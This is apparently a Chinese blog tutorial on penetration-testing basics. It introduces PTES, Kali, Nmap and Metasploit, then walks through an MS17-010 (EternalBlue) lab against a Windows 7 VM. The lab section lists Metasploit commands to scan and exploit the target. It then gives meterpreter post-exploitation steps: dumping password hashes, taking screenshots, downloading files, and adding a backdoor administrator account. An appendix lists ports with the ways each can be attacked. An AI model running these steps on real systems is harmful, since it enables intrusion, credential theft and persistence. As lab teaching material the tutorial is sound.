渗透基础+永恒之蓝演练

这篇具有很好参考价值的文章主要介绍了渗透基础+永恒之蓝演练。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

第一节 渗透测试-概述

1.1 渗透测试定义

渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如涉及缺陷和技术缺陷。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试的意义:站在第三者的角度来思考企业系统的安全性。渗透测试通常具有两个显著特点:

  • 渗透测试是一个渐进的且逐步深入的过程

  • 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试

1.2 渗透测试分类

1.2.1 渗透测试方法分类

1.2.1.1 黑盒测试

黑盒测试:也可叫功能测试,是一种从用户角度出发的测试。把被测程序当作一个黑盒子,测试人员完全不用考虑盒子里面的逻辑结构和具体运作,只依据程序的需求规格说明书,检查程序的功能是否符合它的功能说明。主要的测试方法有等价划分类,错误推测法等。通过软件的外部表现来发现其缺陷和错误。黑盒测试发把黑盒测试看成一个黑盒子,完全不考虑程序内部结构和处理过程。黑盒测试是在程序界面进行测试,它只是检查样序是否按照需求规格说明书的规定正常实现。

1.2.1.2 白盒测试

白盒测试也称为结构测试。它根据程序的控制结构设计测试用例,测试人员会利用程序内部的逻辑结构及有关信息,通过在不同点检查程序状态,检验程序中的每条通路是否都能按预定要求进行正确工作。通过对程序内部结构的分析、检测来寻找问题。白盒测试可以把程序看成装在一个透明的白盒子里,也就是清楚了解程序结构和处理过程,检查是否所有的结构及路径都是正确的,检查软件内部动作是否按照设计说明的规定正常进行。

1.2.1.3 灰盒测试

灰盒测试:是介于白盒测试与黑盒测试之间的一种测试,灰盒测试多用于集成测试阶段,不仅关注输出、输入的正确性,同时也关注程序内部的情况。灰盒测试不像白盒那样详细、完整,但又比黑盒测试更关注程序的内部逻辑。介于白盒测试与黑盒测试之间的测试。灰盒测试关注输出对于输入的准确性,同时也关注内部表现,但这种关注不想白盒测试那样详细、完整,只是通过一些表征性的现象、事件、标志来判断内部的运行状态。灰盒测试结合了白盒测试和黑盒测试的要素。它考虑了用户端、特定的系统知识和操作环境。它在系统组件的协同性环境中评价应用软件的设计。

1.2.1.4 三者的区别

从测试目标和依据来说:黑盒面对的是产品设计,白盒针对的是程序功能的实现,灰盒针对兼而有之,既要考虑产品设计要求,又考虑到功能实现的效果从实现者而言:黑盒在意的是客户的角度,白盒测试针对的研发人员。从测试模块颗粒度而言:白盒在意的是代码实现层面,而灰盒更加侧重模块之间,而黑盒更在于用户层面。

1.2.2 渗透目标分类

  • 主机操作系统测试:对Windows,Solaris,AIX,Linux,SCO,SGI等操作系统本身进行渗透测试。

  • 数据库系统渗透:对MS-SQL,Oracle,MySQL,informix,Sybase,DB2,access等数据库应用系统进行渗透测试。

  • 应用系统测试:对渗透目标提供的各种应用,如ASP,CGI,JSP,PHP等组成的WWW应用进行渗透测试。

  • 网络设备渗透:各种防火墙,入侵检测系统,路由器,交换机等网络设备进行渗透测试。

1.2.3 渗透测试的位置分类

  • 内网渗透:模拟客户内部违规操作者的行为,在内网对目标进行渗透测试
  • 外网渗透:模拟对内部状态一无所知的攻击者的行为(包括对网络设备的远程攻击,口令管理安全测试,防火墙规则试探和规避,web及其他开放应用服务的安全测试等),从外网对目标进行渗透测试。

1.3 渗透测试环节

渗透测试环节:PTES

  • 前期交互阶段(Pre-Engagement Interaction)
    • 范围(需求)
    • 目标
    • 限制条件
    • 服务合同细节
  • 情报搜集阶段(Information Gathering)
    • 公开来源信息查询
    • Google
    • Hacking
    • 社会工程学
    • 网络踩点
    • 扫描探测
    • 被动监听
    • 服务查点
  • 威胁建模阶段(Threat Modeling)
    • 规划攻击
    • 资产分析
    • 威胁分析
  • 漏洞分析阶段(Vulnerability Analysis)
  • 渗透攻击阶段(Exploitation)
  • 后渗透攻击阶段(Post Exploitation)(清除痕迹)
  • 报告阶段(Reporting)
    • 分析薄弱环节
    • 存在的问题
    • 修补与升级技术

第二节 工具介绍

2.1 kali

kali首先是一个操作系统,更确切的说它是一个基于Linux kernel的操作系统,该系统从BackTrack发展而来。而BT是2006年推出的一个用于渗透测试及黑客攻防的专用平台,基于Knoppix(Linux的一个发行版本)开发。Backtrack从2006年的发起版本BackTrack v1.0Beta开始,到2012年推出最终版本BackTrack 5 R3 relerse。之后,2013年offensive Security的Mati Aharoni和Devon Kearns基于Debian重新实现了BackTrack,新的产品命名为kali,从此kali成为新的替代产品和后继者。Kali有以下几个主要特征:

  • kali是基于Debian的Linux发行版
  • kali预装了大量的安全工具
  • kali是永久免费的
  • kali支持大量的无线设备
  • kali系统自身是安全的

kali是一个面向安全的基于Debian的linux发行版,预装了大量的安全软件。其主要功能有三个:数字取证、安全审计、渗透测试。

  • 数字取证

数字取证主要是针对各种电子证据进行识别、收集、保存和分析,用来发现网络和系统的各种入侵行为,为进一步的安全处理提供依据。kali系统提供的数字取证工具很多,可分为数据备份、数据恢复、数据分析和文件取证四种类型,比如:数字备份的Dc3dd,磁盘备份工具Dcfidd,Linux硬盘数据恢复工具dd_rescue,磁盘数据恢复工具Safecopy,文件还原工具Foremost,日志文件系统快查看工具Jact,磁盘镜像分析工具TSK,信息批量提取工具bulk-extrackor,磁盘取证工具Guymager等。

  • 安全审计

安全审计是由“专业审计人员根据有关的法律法规、财产所有者的委托和管理当局的授权,对计算机网络环境下的有关活动或行为进行系统的、独立的检查认证,并作出相应评价”。安全审计涉及四个基本要素:控制目标、安全漏洞、控制措施和控制测试。kali系统提供的安全审计工具有:安全审计工具Lynis,无线安全审计工具FruityWifi,Web应用程序安全设计工具箱Watobo等。

  • 渗透测试

渗透测试是kali系统最主要的功能,他是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。渗透测试有两个主要的特点:首先,渗透测试是一个渐进的并且逐步深入的过程;其次,渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。渗透测试包括信息收集、漏洞扫描、漏洞利用、密码攻击、权限提升,以及针对特定应用或平台的渗透,如web渗透、无线网络渗透等。kali系统提供的渗透测试工具涵盖以上各个方面,主要有:

  • 用于信息搜集的Nmap、Dnsenum,Amap,Webscrab、Recon-NC等;
  • 用于漏洞扫描的Nessus、OpenVAS;用于漏洞利用的Metasploit、w3af;
  • 用于密码工具的Hydra、Ettercap,Msfconsole,DirBuster、WebSlayer等;
  • 用于权限提升的Metperter、SET;
  • 用于无线网络渗透的kismet,aircrack-NG,Gerix WIFI Cracker等

官网:

https://www.kali.org

2.2 NMAP

nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网路连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行那个操作系统(这是亦称fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。
nmap的基本功能:

  • 检测存活在网络上的设备(设备发现)【主机发现Host Discovery】
  • 检测开放的端口号(端口发现或枚举)【端口扫描Port Scanning】
  • 检测到相应的端口号(服务发现)的软件和版本【版本侦测Version Detection】
  • 检测操作系统,硬件地址,以及软件地址【操作系统侦测Operating System Detection】

而这四项功能之间,又存在大致的依赖关系(通常情况下的顺序关系,但特殊应用另外考虑)

  • 首先,需要进行主机发现,
  • 其次,确定端口状态,
  • 再次,确定端口上运行的具体应用程序和版本信息,
  • 然后,可以进行操作系统的侦测。

而在这四项功能的基础上,nmap还提供强大的NSE(nmap Scripting Language)脚本引擎功能,脚本可以对基本功能进行补充和扩展。
Nmap的优点:

  • 灵活:支持数十种不同的扫描方式,支持多种目标对象的扫描
  • 强大:Nmap可以用于扫描互联网上大规模的计算机
  • 可移植:支持主流操作系统:Windows/Linux/Unix/MacOS等等;源码开放,方面移植
  • 简单:提供默认的操作能覆盖大部分功能,基本端口扫描nmap targetip,全面的扫描nmap -A targetip
  • 自由:Nmap作为开源软件,在GPL License的范围内可以自由的使用
  • 文档丰富:Nmap官网提供了详细的文档描述。Nmap作者及其他安全专家编写了多部Nmap参考书籍
  • 社区支持:Nmap背后有强大的社区团队支持

官网

https://nmap.org

源码

https://github.com/nmap/nmap

2.3 Metasploit

Metasploit是当前信息安全与渗透测试领域最流行的术语,它完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些系统上的工作流程基本都一样。第三节的示例是以Kali操作系统为基础,该操作系统预装Metasploit及在其上运行的第三方工具。metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。 MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。MSF可以运行在Linux和windows环境下,我们一般通常都在kali linux操作系统上使用。因为MSF的更新使用kali上的更新命令和更新源即可。

模块介绍

  • 渗透攻击模块(exploit):利用发现的安全漏洞或配置弱点对远程目标系统进行工具的代码;
  • 辅助模块(Aux):实现信息收集及口令猜测、Dos攻击等无法直接取得服务器权限的攻击。验证漏洞是否存在;
  • 攻击载荷模块(payload):攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码
  • 后期渗透模块(Post):该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。
  • 编码工具模块(Encoders):该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检查出来。

功能介绍

  • Single是一种完全独立的Payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此他们有可能会被类似netcat这样非metasploit处理工具所捕捉到。
  • Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件活应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
  • Stage是Stager Payload下的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

渗透攻击步骤
使用MSF渗透测试时,可以综合使用以上模块,对目标系统进行侦察兵发动攻击,大致的步骤如下所示:

  • 扫描目标机系统,寻找可用漏洞
  • 选择并配置一个漏洞利用模块
  • 选择并配置一个工具载荷模块
  • 选择一个编码技术。用来绕过杀毒软件的查杀
  • 渗透攻击

官网

www.metasploit.com

源码

https://github.com/rapid7/metasploit-framework

第三节 入门演练之MS17-010(永恒之蓝)

3.1 永恒之蓝

永恒之蓝原理是一种网络攻击技术,它利用了Windows操作系统中的漏洞,可以远程控制计算机并窃取敏感信息。这种攻击技术被认为是最具破坏性的网络攻击之一,因为它可以在不需要用户交互的情况下传播,而且很难被检测和防御。永恒之蓝原理的攻击方式是利用Windows操作系统中的漏洞,通过网络传播恶意代码。这种攻击方式可以在不需要用户交互的情况下传播,因此很难被检测和防御。一旦攻击成功,攻击者就可以远程控制受害者的计算机,并窃取敏感信息。永恒之蓝原理的攻击方式是非常危险的,因为它可以在不需要用户交互的情况下传播。这意味着即使用户没有打开任何文件或链接,他们的计算机也可能被攻击。此外,永恒之蓝原理的攻击方式很难被检测和防御,因为它利用了Windows操作系统中的漏洞,这些漏洞可能不会被及时修补。为了防止永恒之蓝原理的攻击,用户应该及时更新Windows操作系统和安装杀毒软件。此外,用户还应该避免打开来自不可信来源的文件和链接,以及使用强密码来保护自己的账户和数据。永恒之蓝原理是一种非常危险的网络攻击技术,它可以远程控制计算机并窃取敏感信息。为了保护自己的计算机和数据安全,用户应该及时更新Windows操作系统和安装杀毒软件,避免打开来自不可信来源的文件和链接,以及使用强密码来保护自己的账户和数据。

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。

SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.2 环境准备

靶机:windows 7 -IP:192.168.2.233

攻击机:kali (带有Metasploit和NMAP工具)-IP:192.168.2.214

注意事项:

  • 攻击机和靶机需要再同一局域网下
  • win7不能带有以下补丁,否则将无法实现模拟攻击

3.3 演练过程

3.3.1 信息收集

  • 进入kali,启动控制台,以管理员权限运行
CMD $> sudo su    #启用超管身份
CMD $> ********   # kali 密码
CMD #> 

  • 运行nmap,并扫描网络端口
CMD #> nmap -T4 -A -v 192.168.2.1/24
命令讲解:
-A:用于使用进行性方式扫描
-T4:扫描过程使用时序,总有6个级别(0~5),不建议太高容易被网络设备封杀(建议:3/4)
-v:显示冗余信息,在扫描过程中显示扫描的细节
192.168.2.1/24:扫描192.168.2.X网段内的所有机器
-- 也可以使用 man nmap 查看对用的操作手册
  • 可以进行单IP扫描
CMD #>nmap 192.168.2.233
  • 关于端口说明可以查看附件1 常见端口

3.3.2 检查永恒之蓝漏洞

  • 启动 Metasploit
CMD #>msfconsole
  • 查询ms17-010
msf6 #>search ms17-010 #查询ms17-010漏洞
  • 检查靶机是否存在ms17-010漏洞
msf6 #>use 3 #使用检测代码
msf6 auxiliary(scanner/smb/smb_ms17_010) #>show options #查看设置项
msf6 auxiliary(scanner/smb/smb_ms17_010) #>set rhost 192.168.2.233 #设置检查的目标ip
msf6 auxiliary(scanner/smb/smb_ms17_010) #>run #查询

3.3.3 攻击靶机

  • 启用攻击代码
msf6 auxiliary(scanner/smb/smb_ms17_010) #>use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) #>show options # 查看设置项
msf6 exploit(windows/smb/ms17_010_eternalblue) #>set rhost 192.168.2.233 #设置攻击IP,如果lhost未设置需要再单独设置一次
  • 开始攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) #>run #攻击

meterpreter相关操作

meterpreter #> getuid #查看当前运行的权限
meterpreter #>screenshot #截取目标屏幕
meterpreter #>upload 截屏图片地址 C:\\ 把图片上传到目标C盘
meterpreter #>download C:\img.jpg /root/ #从目标机器下载文件
meterpreter #>hashdump #查看用户信息
meterpreter #>shell
meterpreter #>chcp 65001
CMD #>net user #查看当前用户信息
CMD #>net user test 123456 /add #增加test用户(密码123456)
CMD #>net localgroup administrators test /add #设置用户为管理员用户
CMD #>exit
meterpreter #>hashdump
CMD #>rdesktop ip #启动远程连接

附件

附件1 常见端口

附件1.1 文件共享服务

端口 服务 说明
20/21 FTP/TFTP 文件传输协议,利用方向:允许匿名上传、下载、暴力破解和嗅探
2049 NFS 利用方向:配置不当
139 Samba 利用方向:暴力破解、未授权访问、远程代码执行
389 LDAP目录访问协议 利用方向:注入、允许匿名访问、弱口令
445 windows共享 windows下一个共享文件夹和打印机端口

附件1.2 远程连接服务

端口 服务 说明
22 SSH 利用方向:暴力破解、SSH隧道及内网代理转发、文件传输
23 Telnet 利用方向:暴力破解、嗅探、弱口令
3389 RDP 远程桌面,利用方向:Shift后门(windows server 2003以下版本)
5900 VNC 利用方向:弱口令

附件1.3 WEB应用服务端口

端口 服务 说明
80/443/8080 常见web服务 利用方向:web攻击、暴力破解、对应用服务版本攻击
7001 weblogic控制台 利用方向:java反序列化、弱口令
8080/8089 jboss/Jenkins 利用方向:反序列化、控制台弱口令
9090 websphere控制台/prometheus监控 利用方向:反序列化、控制台弱口令
300 grafana 利用方向:反序列化、控制台弱口令

普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法文章来源地址https://www.toymoban.com/news/detail-711542.html

到了这里,关于渗透基础+永恒之蓝演练的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝(ms17010)漏洞利用

    目录 1.启动msf 2.检查msf库里是否存在ms17-010漏洞 3.扫描靶机开放端口 4.配置目标ip,本地ip并利用exploit进行攻击

    2024年02月11日
    浏览(43)
  • 永恒之蓝全过程复现

    一,永恒之蓝简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒, 英国

    2024年02月12日
    浏览(44)
  • MS17010(永恒之蓝)漏洞实战

    曾因苦难多壮志,不教红尘惑坚心。 使用搜索命令,搜索ms17_010 search ms17_010 搜索网段中主机漏洞 use auxiliary/scanner/smb/smb_ms17_010 照例,show options 看一下配置 设置网段,run运行就行了 使用攻击模块 查看所需要的配置show options 开始配置payload、渗透地址、监听地址 开始攻击输入

    2024年02月07日
    浏览(37)
  • 复现永恒之蓝[MS17_010]

    目录 准备靶机 测试ping连通性 攻击漏洞 利用漏洞 1台kali,1台win7 win7系统可以在MSDN镜像网站里获取 注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统     win7的IP地址为192.168.164.129  kali的IP地址为192.168.164.130 将这两台机器互

    2024年02月01日
    浏览(37)
  • 永恒之蓝漏洞原理及漏洞复现

    摘要 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个

    2024年02月03日
    浏览(86)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(38)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(48)
  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(74)
  • 永恒之蓝(ms17-010)简介与复现

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲

    2024年02月10日
    浏览(49)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包